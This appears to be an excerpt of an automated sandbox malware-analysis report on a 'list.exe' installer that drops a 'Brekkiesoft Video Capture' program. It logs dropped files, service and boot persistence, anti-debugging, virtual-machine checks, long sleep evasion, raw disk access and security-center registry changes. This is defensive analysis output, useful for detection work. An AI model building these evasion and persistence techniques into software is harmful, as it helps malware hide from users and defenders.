                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004055BE push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00485678 push ecx; mov dword ptr [esp], ecx2_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0040563B push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004517F8 push 0045182Bh; ret 2_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004519BC push ecx; mov dword ptr [esp], eax2_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00477B08 push ecx; mov dword ptr [esp], edx2_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00419C28 push ecx; mov dword ptr [esp], ecx2_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0045FD1C push ecx; mov dword ptr [esp], ecx2_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00499D30 pushad ; retf 2_2_00499D3F
                    Source: bsoftvideocapture33.exe.2.drStatic PE information: section name: _aett_1 entropy: 7.752870714749948
                    Source: BrekkiesoftVideoCapture.exe.6.drStatic PE information: section name: _aett_1 entropy: 7.752870714749948

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02C0E8A8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-0G4JQ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-1B315.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-B9LPS.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-5FBME.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeFile created: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exeJump to dropped file
                    Source: C:\Users\user\Desktop\list.exeFile created: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\is-FUIGA.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-KK3F9.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeFile created: C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-A2HQB.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-P0L8V.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpFile created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeFile created: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeFile created: C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02C0E8A8
                    Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_004016B0 StartServiceCtrlDispatcherA,GlobalFree,6_2_004016B0
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004241DC IsIconic,SetActiveWindow,SetFocus,2_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00424194 IsIconic,SetActiveWindow,2_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00417598 IsIconic,GetCapture,2_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,2_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00417CCE IsIconic,SetWindowPos,2_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_0041F118
                    Source: C:\Users\user\Desktop\list.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,6_2_02C0E9AC
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeWindow / User API: threadDelayed 2518Jump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeWindow / User API: threadDelayed 7411Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-0G4JQ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-1B315.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-B9LPS.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-5FBME.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\is-FUIGA.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-KK3F9.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-A2HQB.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-P0L8V.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\list.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5966
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-61508
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeAPI coverage: 2.9 %
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532Thread sleep count: 2518 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532Thread sleep time: -5036000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 8180Thread sleep time: -1260000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532Thread sleep count: 7411 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532Thread sleep time: -14822000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00452A60 FindFirstFileA,GetLastError,2_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,2_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose,2_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00463CDC
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeThread delayed: delay time: 60000Jump to behavior
                    Source: list.exeBinary or memory string: HGfS'
                    Source: svchost.exe, 00000007.00000002.2501968273.000001B996C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: svchost.exe, 00000007.00000002.2501968273.000001B996C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000888000.00000004.00000020.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000007.00000002.2501511346.000001B996C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.2502200656.000001B996C89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.2501968273.000001B996C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000009.00000002.2501623294.000002DC5B02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\list.exeAPI call chain: ExitProcess graph end nodegraph_0-6763
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeAPI call chain: ExitProcess graph end nodegraph_6-61116
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_6-61403
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C13A08 _memset,IsDebuggerPresent,6_2_02C13A08
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C1E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,6_2_02C1E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502C0
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C05E5F RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,6_2_02C05E5F
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C180E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02C180E8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,2_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,2_2_0042E09C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_02C0E860 cpuid 6_2_02C0E860
                    Source: C:\Users\user\Desktop\list.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\list.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: GetLocaleInfoA,2_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: GetLocaleInfoA,2_2_004085B4
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,2_2_004585C8
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmpCode function: 2_2_0045559C GetUserNameA,2_2_0045559C
                    Source: C:\Users\user\Desktop\list.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
